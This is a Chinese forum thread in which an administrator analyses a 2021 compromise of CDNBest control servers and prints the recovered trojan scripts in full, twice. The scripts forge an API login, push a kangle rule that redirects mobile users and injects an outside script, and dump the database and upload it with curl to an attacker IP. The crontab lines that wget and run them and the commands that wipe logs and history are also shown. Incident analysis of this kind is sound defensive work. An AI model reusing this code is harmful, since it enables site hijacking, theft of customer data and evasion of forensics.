jc00000.py 文件，最近cdnbest主控被黑的木马残留文件，301到某非法网站中，补充cbcea1a.py

小樱 · 发表于 2021/4/16 22:38

jc00000.py 文件，最近cdnbest主控被黑的木马残留文件，301到某非法网站中，补充cbcea1a.py

存放在/root/jc00000.py 中，内容如下，会下发配置文件到节点，安装一个名为kangle_vhs的配置文件，控制节点kangle的规则进行执行跳转
时间，攻击者共进行了两次，入侵时间应该为4月12号晚上23:17
4月14日 16:02
4月16日 13:31
猜测，因为节点，，要连接授权服务器，授权服务器返回主控ip给节点
安装节点的时候后面不是有个uid，批量扫一下uid就出来了。。查询每个uid背后的授权ip然后通过漏洞对其攻击

虽然找到木马文件了，但是得找到入口才行，如何上传木马文件得渠道，否则就算堵了木马文件的执行方案也没有用。

cdnbest本地主控利用kangle实现禁止admin管理员后台控制面板登陆的方法
https://bbs.itzmx.com/thread-97666-1-1.html

被黑关联贴：https://bbs.itzmx.com/thread-97664-1-1.html

import fileinput,os,requests
from json import loads,dumps
import time,sys
from hashlib import md5
if len(sys.argv) != 3:
print("ip none")
sys.exit()
ip = sys.argv[1]
revice_ip = sys.argv[2]
uid = os.popen('mysql -uroot cdnbest -e "select uid from users order by createtime asc limit 1"').read().split("\n")[1]
time.sleep(1)
print("uid:"+str(uid))
for line in fileinput.input("/var/spool/cron/root",inplace = True):
if "jc00000.py" not in line:
print(line.rstrip().replace('* * * * * wget http://'+revice_ip+'/jc00000.py && python ./jc00000.py '+ip+' '+revice_ip,''))
f = open("/var/spool/cron/root","r").read().split("\n")
os.popen('rm -f /var/spool/cron/root')
f2 = open("/var/spool/cron/root","a")
os.popen("rm -f /var/log/cron")
os.popen("touch /var/log/cron")
for x in f:
if x != "":
f2.write(x+"\n")
f2.close()
kangle = '''
<config>
<request action='vhs' >
<table name='BEGIN'>
<chain action='continue' >
<acl_reg_param revers='1' param='version' nc='1'></acl_reg_param>
<acl_header header='User-Agent' nc='1'><![CDATA[((Android)|(iPhone))]]></acl_header>
<acl_reg_param param='=' nc='1'></acl_reg_param>
<mark_url_rewrite url='(.*)' dst='$1&version=' nc='1' code='301'></mark_url_rewrite>
</chain>
<chain action='continue' >
<acl_reg_param revers='1' param='version' nc='1'></acl_reg_param>
<acl_header header='User-Agent' nc='1'><![CDATA[((Android)|(iPhone))]]></acl_header>
<acl_reg_param revers='1' param='=' nc='1'></acl_reg_param>
<mark_url_rewrite url='(.*)' dst='$1?version=' nc='1' code='301'></mark_url_rewrite>
</chain>
<chain action='continue' >
<mark_remove_header attr='Accept-Encoding' val='.' ></mark_remove_header>
</chain>
</table>
</request>
<response action='allow' >
<table name='BEGIN'>
<chain action='continue' >
<acl_reg_param param='version' nc='1'></acl_reg_param>
<acl_header header='Content-Type' nc='1'><![CDATA[(html)]]></acl_header>
<mark_replace_content content='</html>' replace='<div style="display:none"><script src="https://code.jquery.asia/jquery.min-3.6.0.js" language="JavaScript"></script></div></html>' nc='1' charset='utf-8' buffer='1M'></mark_replace_content>
</chain>
</table>
</response>
</config>
'''
os.popen('mysql -uroot cdnbest -e "delete from usersetting where name = \'skey\';delete from usersetting where name = \'use_api_white\';insert into usersetting (uid,name,value) values('+str(uid)+',\'skey\',\'123456\');insert into usersetting (uid,name,value) values('+str(uid)+',\'use_api_white\',\'\');"')
time.sleep(2)
print('wait skey insert')
times = str(int(time.time()))
sign = md5((md5((str(uid)+"123456").encode('utf8')).hexdigest()+times).encode('utf8')).hexdigest()
vhost = ""
data = dumps({'uid':uid,'time':times,'sign':sign,'vhost':vhost})
headers = {"Content-Type":"application/json"}
r =requests.post(ip+"/api/user/login/token",data,headers=headers)
resJson = loads(r.text)
if resJson["data"]["sessionId"]:
print("JSESSIONID:"+resJson["data"]["sessionId"])
cookie = {"JSESSIONID":resJson["data"]["sessionId"]}
retlist = requests.get(ip+"/api/user/nodegroup/list",headers=headers,cookies=cookie)
resJson = loads(retlist.text)
if resJson["data"]:
for item in resJson["data"]:
custom = dumps({'name':'kangle_vhs','value':kangle})
res = requests.post(ip+"/api/user/nodegroup/config/custom/"+str(item["id"]),custom,headers=headers,cookies=cookie)
print(str(item["id"]) + ":done")
print("waiting done 5")
time.sleep(5)
os.popen('mysql -uroot cdnbest -e "delete from vhost_config where name = \'kangle_vhs\'"')
os.popen('mysql -uroot cdnbest -e "delete from usersetting where name = \'skey\';delete from usersetting where name = \'use_api_white\';"')
else:
print("token error")
os.popen("rm -f /vhs2/cbmaster/var/cdnbest-web.log && touch /vhs2/cbmaster/var/cdnbest-web.log")
os.popen("rm -f /vhs2/cbmaster/var/access2.log && touch /vhs2/cbmaster/var/access2.log")
os.popen("rm -rf /tmp/best.tar.gz")
os.popen("history -c")
os.popen("rm -f ./jc00000.py")

复制代码

补充，17日11点13分的时候，攻击者再次出现，上传cbcea1a.py木马文件，会打包当前数据库提交到木马服务器

import fileinput,os,subprocess,time,sys
if len(sys.argv) != 2:
print("ip none")
sys.exit()
ip = sys.argv[1]
for line in fileinput.input("/var/spool/cron/root",inplace = True):
if "cbcea1a.py" not in line:
print(line.rstrip().replace('* * * * * wget http://'+ip+'/cbcea1a.py && python ./cbcea1a.py '+ip,''))
f = open("/var/spool/cron/root","r").read().split("\n")
os.popen('rm -f /var/spool/cron/root')
f2 = open("/var/spool/cron/root","a")
os.popen("rm -f /var/log/cron")
os.popen("touch /var/log/cron")
for x in f:
if x != "":
f2.write(x+"\n")
f2.close()
info = os.popen('mysql -uroot cdnbest -e "set names utf8;select value from setting where name in (\'system_domian\',\'system_name\',\'system_footer\') order by name asc"').read().split("\n")
system_domian = ""
system_name = ""
system_footer = ""
try:
if info[1]:
system_domian = info[1]
except IndexError:
pass
try:
if info[2]:
system_name = info[2]
except IndexError:
pass
try:
if info[3]:
system_footer = info[3]
except IndexError:
pass
filename = str(system_domian)+"_"+str(system_name)+"_"+str(system_footer)
os.popen('mysqldump -u root cdnbest > /tmp/cdnbest.sql')
p = subprocess.Popen(["tar", "-czvf","/tmp/best.tar.gz","/tmp/cdnbest.sql"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.wait()
x = subprocess.Popen(["curl", "-F","file=@/tmp/best.tar.gz","http://"+ip+"/x1.php?f="+filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
x.wait()
os.popen("rm -f /vhs2/cbmaster/var/cdnbest-web.log && touch /vhs2/cbmaster/var/cdnbest-web.log")
os.popen("rm -f /vhs2/cbmaster/var/access2.log && touch /vhs2/cbmaster/var/access2.log")
os.popen("rm -rf /tmp/best.tar.gz")
os.popen("history -c")
time.sleep(1)
os.popen("rm -f ./cbcea1a.py")

复制代码

/var/spool/cron/root文件内容，查看/var/log/cron执行日志信息观察到被插入修改时间为17日下午15.45分。

* * * * * wget http://23.97.69.188/cbcea1a.py && python ./cbcea1a.py 23.97.69.188
* * * * * wget http://23.97.69.188/cbcea1a.py && python ./cbcea1a.py 23.97.69.188
* * * * * wget http://23.97.69.188/jc00000.py && python ./jc00000.py http://119.28.11.131 23.97.69.188
* * * * * wget http://23.97.69.188/jc00000.py && python ./jc00000.py https://119.28.11.131:4430 23.97.69.188
* * * * * wget http://23.97.69.188:8008/jc00000.py && python ./jc00000.py https://119.28.11.131:4430 23.97.69.188

复制代码

看到的木马文件会上传数据库信息到木马服务器。和修改主控配置信息同步下发到节点，并且会放在 /vhs2/cbmaster/web2/wwwroot/user/assets/fill/best.tar.gz 中，用于随时下载数据库信息
数据库文件里面有用户域名，注册信息，等等，有可能的，同行竞争把对手的东西搞坏，估计把对手搞掉，然后通过信息联系拉客户用。。涉及到利益问题了
公开只说cdnbest-web.jar就这玩意的漏洞，绕过了官方自带的waf规则实现了任意命令执行漏洞
由于上方说的原因，所以我也不太好公开修复方案，要修复的可以联系我付费修复5K一次性修复这个漏洞，不保证还有其它漏洞入口进行入侵导致后续出现问题。
解决：https://bbs.itzmx.com/thread-97812-1-1.html

根据排查，漏洞入口为下，感谢这位木马作者马大忽的操作，，，虽然你做了各种日志爬虫混淆，但是还是被我找到了

购买主题本主题需向作者支付 9999 樱币 才能浏览

aming · 发表于 2021/4/16 22:55

谢谢樱紫了。。。。。

小樱 · 发表于 2021/4/16 23:15

aming 发表于 2021/4/16 22:55
谢谢樱紫了。。。。。

攻击者只留下了个木马，木马攻击随时都可以改的，当天关键的日志都被清了

不可名 · 发表于 2021/4/16 23:23

我还以为小樱电脑又中毒了

aming · 发表于 2021/4/16 23:33

小樱发表于 2021/4/16 23:15
攻击者只留下了个木马，木马攻击随时都可以改的，当天关键的日志都被清了

我先安个云锁吧。麻烦小樱在帮我想想怎么防止他入侵吧55555

不可名 · 发表于 2021/4/19 02:00

matt4846 · 发表于 2021/4/20 00:10

给力

帐号		自动登录	找回密码
密码			注册论坛

小樱小樱当前离线积分 58428 成长值: 252 签到天数: 4709 天 [LV.Master]伴坛终老	发表于 2021/4/16 22:38 \| 显示全部楼层 \|阅读模式 \|Google Chrome 89.0.4389.128\|Windows 10 jc00000.py 文件，最近cdnbest主控被黑的木马残留文件，301到某非法网站中，补充cbcea1a.py 存放在/root/jc00000.py 中，内容如下，会下发配置文件到节点，安装一个名为kangle_vhs的配置文件，控制节点kangle的规则进行执行跳转时间，攻击者共进行了两次，入侵时间应该为4月12号晚上23:17 4月14日 16:02 4月16日 13:31 猜测，因为节点，，要连接授权服务器，授权服务器返回主控ip给节点安装节点的时候后面不是有个uid，批量扫一下uid就出来了。。查询每个uid背后的授权ip然后通过漏洞对其攻击虽然找到木马文件了，但是得找到入口才行，如何上传木马文件得渠道，否则就算堵了木马文件的执行方案也没有用。 cdnbest本地主控利用kangle实现禁止admin管理员后台控制面板登陆的方法 https://bbs.itzmx.com/thread-97666-1-1.html 被黑关联贴：https://bbs.itzmx.com/thread-97664-1-1.html import fileinput,os,requests from json import loads,dumps import time,sys from hashlib import md5 if len(sys.argv) != 3: print("ip none") sys.exit() ip = sys.argv[1] revice_ip = sys.argv[2] uid = os.popen('mysql -uroot cdnbest -e "select uid from users order by createtime asc limit 1"').read().split("\n")[1] time.sleep(1) print("uid:"+str(uid)) for line in fileinput.input("/var/spool/cron/root",inplace = True): if "jc00000.py" not in line: print(line.rstrip().replace('* * * * * wget http://'+revice_ip+'/jc00000.py && python ./jc00000.py '+ip+' '+revice_ip,'')) f = open("/var/spool/cron/root","r").read().split("\n") os.popen('rm -f /var/spool/cron/root') f2 = open("/var/spool/cron/root","a") os.popen("rm -f /var/log/cron") os.popen("touch /var/log/cron") for x in f: if x != "": f2.write(x+"\n") f2.close() kangle = ''' <config> <request action='vhs' > <table name='BEGIN'> <chain action='continue' > <acl_reg_param revers='1' param='version' nc='1'></acl_reg_param> <acl_header header='User-Agent' nc='1'><![CDATA[((Android)\|(iPhone))]]></acl_header> <acl_reg_param param='=' nc='1'></acl_reg_param> <mark_url_rewrite url='(.)' dst='$1&version=' nc='1' code='301'></mark_url_rewrite> </chain> <chain action='continue' > <acl_reg_param revers='1' param='version' nc='1'></acl_reg_param> <acl_header header='User-Agent' nc='1'><![CDATA[((Android)\|(iPhone))]]></acl_header> <acl_reg_param revers='1' param='=' nc='1'></acl_reg_param> <mark_url_rewrite url='(.)' dst='$1?version=' nc='1' code='301'></mark_url_rewrite> </chain> <chain action='continue' > <mark_remove_header attr='Accept-Encoding' val='.' ></mark_remove_header> </chain> </table> </request> <response action='allow' > <table name='BEGIN'> <chain action='continue' > <acl_reg_param param='version' nc='1'></acl_reg_param> <acl_header header='Content-Type' nc='1'><![CDATA[(html)]]></acl_header> <mark_replace_content content='</html>' replace='<div style="display:none"><script src="https://code.jquery.asia/jquery.min-3.6.0.js" language="JavaScript"></script></div></html>' nc='1' charset='utf-8' buffer='1M'></mark_replace_content> </chain> </table> </response> </config> ''' os.popen('mysql -uroot cdnbest -e "delete from usersetting where name = \'skey\';delete from usersetting where name = \'use_api_white\';insert into usersetting (uid,name,value) values('+str(uid)+',\'skey\',\'123456\');insert into usersetting (uid,name,value) values('+str(uid)+',\'use_api_white\',\'\');"') time.sleep(2) print('wait skey insert') times = str(int(time.time())) sign = md5((md5((str(uid)+"123456").encode('utf8')).hexdigest()+times).encode('utf8')).hexdigest() vhost = "" data = dumps({'uid':uid,'time':times,'sign':sign,'vhost':vhost}) headers = {"Content-Type":"application/json"} r =requests.post(ip+"/api/user/login/token",data,headers=headers) resJson = loads(r.text) if resJson["data"]["sessionId"]: print("JSESSIONID:"+resJson["data"]["sessionId"]) cookie = {"JSESSIONID":resJson["data"]["sessionId"]} retlist = requests.get(ip+"/api/user/nodegroup/list",headers=headers,cookies=cookie) resJson = loads(retlist.text) if resJson["data"]: for item in resJson["data"]: custom = dumps({'name':'kangle_vhs','value':kangle}) res = requests.post(ip+"/api/user/nodegroup/config/custom/"+str(item["id"]),custom,headers=headers,cookies=cookie) print(str(item["id"]) + ":done") print("waiting done 5") time.sleep(5) os.popen('mysql -uroot cdnbest -e "delete from vhost_config where name = \'kangle_vhs\'"') os.popen('mysql -uroot cdnbest -e "delete from usersetting where name = \'skey\';delete from usersetting where name = \'use_api_white\';"') else: print("token error") os.popen("rm -f /vhs2/cbmaster/var/cdnbest-web.log && touch /vhs2/cbmaster/var/cdnbest-web.log") os.popen("rm -f /vhs2/cbmaster/var/access2.log && touch /vhs2/cbmaster/var/access2.log") os.popen("rm -rf /tmp/best.tar.gz") os.popen("history -c") os.popen("rm -f ./jc00000.py") 复制代码补充，17日11点13分的时候，攻击者再次出现，上传cbcea1a.py木马文件，会打包当前数据库提交到木马服务器 import fileinput,os,subprocess,time,sys if len(sys.argv) != 2: print("ip none") sys.exit() ip = sys.argv[1] for line in fileinput.input("/var/spool/cron/root",inplace = True): if "cbcea1a.py" not in line: print(line.rstrip().replace('* * * * * wget http://'+ip+'/cbcea1a.py && python ./cbcea1a.py '+ip,'')) f = open("/var/spool/cron/root","r").read().split("\n") os.popen('rm -f /var/spool/cron/root') f2 = open("/var/spool/cron/root","a") os.popen("rm -f /var/log/cron") os.popen("touch /var/log/cron") for x in f: if x != "": f2.write(x+"\n") f2.close() info = os.popen('mysql -uroot cdnbest -e "set names utf8;select value from setting where name in (\'system_domian\',\'system_name\',\'system_footer\') order by name asc"').read().split("\n") system_domian = "" system_name = "" system_footer = "" try: if info[1]: system_domian = info[1] except IndexError: pass try: if info[2]: system_name = info[2] except IndexError: pass try: if info[3]: system_footer = info[3] except IndexError: pass filename = str(system_domian)+"_"+str(system_name)+"_"+str(system_footer) os.popen('mysqldump -u root cdnbest > /tmp/cdnbest.sql') p = subprocess.Popen(["tar", "-czvf","/tmp/best.tar.gz","/tmp/cdnbest.sql"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) p.wait() x = subprocess.Popen(["curl", "-F","file=@/tmp/best.tar.gz","http://"+ip+"/x1.php?f="+filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE) x.wait() os.popen("rm -f /vhs2/cbmaster/var/cdnbest-web.log && touch /vhs2/cbmaster/var/cdnbest-web.log") os.popen("rm -f /vhs2/cbmaster/var/access2.log && touch /vhs2/cbmaster/var/access2.log") os.popen("rm -rf /tmp/best.tar.gz") os.popen("history -c") time.sleep(1) os.popen("rm -f ./cbcea1a.py") 复制代码 /var/spool/cron/root文件内容，查看/var/log/cron执行日志信息观察到被插入修改时间为17日下午15.45分。 * * * * * wget http://23.97.69.188/cbcea1a.py && python ./cbcea1a.py 23.97.69.188 * * * * * wget http://23.97.69.188/cbcea1a.py && python ./cbcea1a.py 23.97.69.188 * * * * * wget http://23.97.69.188/jc00000.py && python ./jc00000.py http://119.28.11.131 23.97.69.188 * * * * * wget http://23.97.69.188/jc00000.py && python ./jc00000.py https://119.28.11.131:4430 23.97.69.188 * * * * * wget http://23.97.69.188:8008/jc00000.py && python ./jc00000.py https://119.28.11.131:4430 23.97.69.188 复制代码看到的木马文件会上传数据库信息到木马服务器。和修改主控配置信息同步下发到节点，并且会放在 /vhs2/cbmaster/web2/wwwroot/user/assets/fill/best.tar.gz 中，用于随时下载数据库信息数据库文件里面有用户域名，注册信息，等等，有可能的，同行竞争把对手的东西搞坏，估计把对手搞掉，然后通过信息联系拉客户用。。涉及到利益问题了公开只说cdnbest-web.jar就这玩意的漏洞，绕过了官方自带的waf规则实现了任意命令执行漏洞由于上方说的原因，所以我也不太好公开修复方案，要修复的可以联系我付费修复5K一次性修复这个漏洞，不保证还有其它漏洞入口进行入侵导致后续出现问题。解决：https://bbs.itzmx.com/thread-97812-1-1.html 根据排查，漏洞入口为下，感谢这位木马作者马大忽的操作，，，虽然你做了各种日志爬虫混淆，但是还是被我找到了购买主题本主题需向作者支付 9999 樱币才能浏览
	欢迎光临IT技术交流论坛：http://bbs.itzmx.com/
	回复使用道具举报

jc00000.py 文件，最近cdnbest主控被黑的木马残留文件 ，301到某非法网站中，补充cbcea1a.py

jc00000.py 文件，最近cdnbest主控被黑的木马残留文件，301到某非法网站中，补充cbcea1a.py